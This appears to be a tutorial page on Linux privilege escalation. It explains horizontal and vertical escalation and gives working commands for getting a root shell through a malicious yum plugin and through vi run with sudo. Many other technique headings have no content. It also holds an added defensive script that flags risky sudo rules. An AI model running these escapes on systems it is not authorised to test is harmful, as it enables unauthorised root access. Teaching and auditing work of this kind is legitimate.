Linux Privilege Escalation SUID bit

Linux Privilege Escalation

Linux privilege escalation can be difficult to explore. Here I will explain what Linux privesc is and how you can do it manually or with tools that gather information about the system and suggest public exploits based on the system's kernel version or misconfigurations.

What is Linux Privilege Escalation?

Privesc is the process of gaining more access on a system than our current user has.

If a low-privilege user can read, write or execute a script with root permissions, the user can use this to escalate privileges and get a root shell. Sysadmins often leave scripts or processes running on the system with root access and without a proper configuration.

Types of Privilege Escalation

Horizontal privilege escalation

This is where you expand your reach over the compromised system by taking over a different user who is on the same privilege level as you. For instance, a normal user hijacking another normal user (rather than elevating to superuser).

Vertical privilege escalation

This is where you attempt to gain higher privileges or access with an existing account that you have already compromised.

For local privilege escalation attacks this might mean hijacking an account with administrator privileges or root privileges.

Exploiting Writeable /etc/passwd

Elevate privileges using yum

RFS=$(mktemp -d)
cat >$RFS/x<<EOF
[main]
plugins=1
pluginpath=$RFS
pluginconfpath=$RFS
EOF
cat >$RFS/y.conf<<EOF
[main]
enabled=1
EOF
cat >$RFS/y.py<<EOF
import os
import yum
from yum.plugins import PluginYumExit, TYPE_CORE, TYPE_INTERACTIVE
requires_api_version='2.1'
def init_hook(conduit):
  os.execl('/bin/sh','/bin/sh')
EOF

sudo yum -c $RFS/x --enableplugin=y

Escaping VI Editor

sudo -l

sudo vi

:!sh
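
The defensive counterpart to the two sudo techniques above, as an added example that is not part of the original post: a shell function that reads `sudo -l` output and flags rules granting vi or yum, or unrestricted ALL. The function name, the `ESCAPE_BINS` list and the sample output are constructed for illustration.

```shell
#!/bin/sh
# Added example: flag sudo rules that grant the binaries this page uses.
# ESCAPE_BINS holds only vi and yum, the two shown on the page (assumption:
# extend it after reviewing what your own sudoers rules grant).
ESCAPE_BINS="vi yum"

# audit_sudo_rules reads `sudo -l` output on stdin, prints one FLAG line per
# risky grant, and returns 1 if anything was flagged, 0 otherwise.
audit_sudo_rules() {
    awk -v bins="$ESCAPE_BINS" '
    BEGIN { n = split(bins, b, " "); for (i = 1; i <= n; i++) risky[b[i]] = 1 }
    # Rule lines start with the run-as user: "    (root) NOPASSWD: /usr/bin/vi"
    /^[ \t]*\(/ {
        runas = $0
        sub(/^[ \t]*\(/, "", runas); sub(/\).*/, "", runas); gsub(/[ \t]/, "", runas)
        line = $0
        sub(/^[ \t]*\([^)]*\)[ \t]*/, "", line)
        # Drop tags such as NOPASSWD: or SETENV: in front of the command list
        while (match(line, /^[A-Z_]+:[ \t]*/)) line = substr(line, RLENGTH + 1)
        m = split(line, cmds, /,[ \t]*/)
        for (j = 1; j <= m; j++) {
            split(cmds[j], words, " ")
            path = words[1]
            if (path == "ALL") { print "FLAG " runas " ALL (unrestricted)"; found = 1; continue }
            k = split(path, parts, "/")
            if (parts[k] in risky) { print "FLAG " runas " " path; found = 1 }
        }
    }
    END { exit (found ? 1 : 0) }'
}

# Constructed sample of `sudo -l` output (not captured from a real host).
# service and uptime pass only because they are not listed in ESCAPE_BINS.
SAMPLE='User alice may run the following commands on web01:
    (root) NOPASSWD: /usr/bin/vi
    (root) /usr/bin/yum, /usr/sbin/service nginx reload
    (www) NOPASSWD: /usr/bin/uptime'

printf '%s\n' "$SAMPLE" | audit_sudo_rules || echo "review the flagged rules"
```

A rule that grants vi only so a user can edit one file is usually better expressed with `sudoedit` on that file, which runs the editor as the invoking user rather than as root.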

Suid privilege escalation

Systemctl privilege escalation

Crontab privilege escalation

Python privilege escalation linux

SSH privilege escalation

Privilege Escalation Exploits

Dirty cow exploit

Scripts

Using LinEnum